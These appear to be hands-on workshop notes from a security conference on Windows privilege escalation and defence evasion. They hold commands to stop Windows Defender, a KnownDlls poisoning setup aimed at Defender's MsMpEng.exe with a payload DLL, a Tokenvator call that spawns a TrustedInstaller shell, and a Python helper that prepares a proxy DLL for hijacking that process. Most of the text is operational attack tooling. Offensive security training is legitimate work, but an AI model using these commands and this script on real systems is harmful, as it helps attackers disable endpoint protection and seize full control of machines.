Collaborative notes @ https://hackmd.io/@XHFUQdfkR4unNiIFF3-kjA/hitcon23

https://blog.xpnsec.com/wam-bam/

Slide: [Google Drive](https://drive.google.com/file/d/1GrPGYzlTCf2dyMpZYp8MXz0pNwo9tUoO/view?usp=sharing)

###

```
set PATH=%PATH%;C:\radare2-5.7.4-w64\bin
python offsetExtract.py -i C:\Windows\System32\ntoskrnl.exe
```

https://github.com/aaaddress1/PR0CESS/tree/main/HideMyAss

### KnownDlls Poison

```
VERSION.dll
C:\Users\exploit\Desktop\EventAggregation_Payload.dll
"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MsMpEng.exe"
```

https://github.com/itm4n/PPLdump/tree/master

### Msvcr100 - redistributable package

https://www.microsoft.com/zh-tw/download/details.aspx?id=26999

https://posts.specterops.io/understanding-and-defending-against-access-token-theft-finding-alternatives-to-winlogon-exe-80696c8a73b

https://blog.xpnsec.com/becoming-system/

### `Siofra64.exe --mode file-scan -f C:\Windows\System32\ -r --signed --auto-elevate --enum-dependency --dll-hijack`

```
C:\toolchain\Forshaw\TokenViewer.exe
sc stop WinDefend
C:\toolchain\Tokenvator.exe GetTrustedInstaller /Command:cmd.exe
```
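The KnownDlls Poison block above only lists a DLL name, a payload DLL and a target process. The following script is an added example, not part of these notes and not code from PPLdump or Siofra, that does the pre-flight checks a practitioner wants before trying a DLL-hijack of that kind: whether the name is on the KnownDLLs list (the loader maps those from the `\KnownDlls` object directory, so a plain search-order hijack of such a name fails and only a poisoning of that lookup, which is what PPLdump abuses, gets around it), which functions the target actually imports from the DLL, and the MSVC forwarder pragmas a proxy DLL needs so the target keeps working. PE parsing relies on the third-party `pefile` package; `SAMPLE_KNOWN_DLLS` is a constructed list for offline use, and the registry reader only works on Windows. The paths used as defaults are the ones from the notes.

```python
"""Pre-flight checks for a DLL search-order hijack (added example)."""
import sys
from typing import Iterable, List

try:
    import pefile  # pip install pefile
except ImportError:  # the pure helpers below still work without it
    pefile = None

# Constructed sample standing in for the KnownDLLs registry data (offline use only).
SAMPLE_KNOWN_DLLS = ["advapi32.dll", "kernel32.dll", "user32.dll", "gdi32.dll", "combase.dll"]


def is_known_dll(dll_name: str, known: Iterable[str]) -> bool:
    """Case-insensitive test: is dll_name resolved from \\KnownDlls instead of the search order?"""
    return dll_name.lower() in {k.lower() for k in known}


def known_dlls_from_registry() -> List[str]:
    """Read HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs (Windows only)."""
    import winreg
    key_path = r"SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"
    names = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
        index = 0
        while True:
            try:
                value_name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # no more values
                break
            index += 1
            if value_name.lower().startswith("dlldirectory"):  # DllDirectory/DllDirectory32 are paths, not DLLs
                continue
            names.append(data)
    return names


def forwarder_pragmas(export_names: Iterable[str], original_stem: str) -> List[str]:
    """Linker pragmas that forward each export of the proxy DLL to the renamed original DLL."""
    return [f'#pragma comment(linker, "/EXPORT:{name}={original_stem}.{name}")'
            for name in export_names]


def imported_functions(target_path: str, dll_name: str) -> List[str]:
    """Function names target_path imports from dll_name (empty list if it does not import it)."""
    pe = pefile.PE(target_path, fast_load=True)
    pe.parse_data_directories(directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_IMPORT"]])
    for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
        if entry.dll.decode(errors="ignore").lower() == dll_name.lower():
            return [imp.name.decode() for imp in entry.imports if imp.name]
    return []


def exported_functions(dll_path: str) -> List[str]:
    """Named exports of the genuine DLL; the proxy must forward every one of them."""
    pe = pefile.PE(dll_path, fast_load=True)
    pe.parse_data_directories(directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]])
    return [sym.name.decode() for sym in pe.DIRECTORY_ENTRY_EXPORT.symbols if sym.name]


def main(argv: List[str]) -> None:
    dll_name = argv[1] if len(argv) > 1 else "VERSION.dll"
    target = argv[2] if len(argv) > 2 else (
        r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MsMpEng.exe")
    real_dll = argv[3] if len(argv) > 3 else r"C:\Windows\System32\version.dll"

    known = known_dlls_from_registry() if sys.platform == "win32" else SAMPLE_KNOWN_DLLS
    if is_known_dll(dll_name, known):
        print(f"{dll_name} is a KnownDLL: a search-order hijack will not be honoured")
    else:
        print(f"{dll_name} is not a KnownDLL: search order applies")

    if pefile is None:
        print("pefile not installed; skipping import/export analysis")
        return
    imports = imported_functions(target, dll_name)
    print(f"{target} imports {len(imports)} function(s) from {dll_name}: {imports}")
    for line in forwarder_pragmas(exported_functions(real_dll), "version_orig"):
        print(line)


if __name__ == "__main__":
    main(sys.argv)
```

Run it with the DLL name, the target binary and the path to the genuine DLL; the printed pragmas go into the proxy DLL's source, with the genuine DLL renamed to `version_orig.dll` beside it.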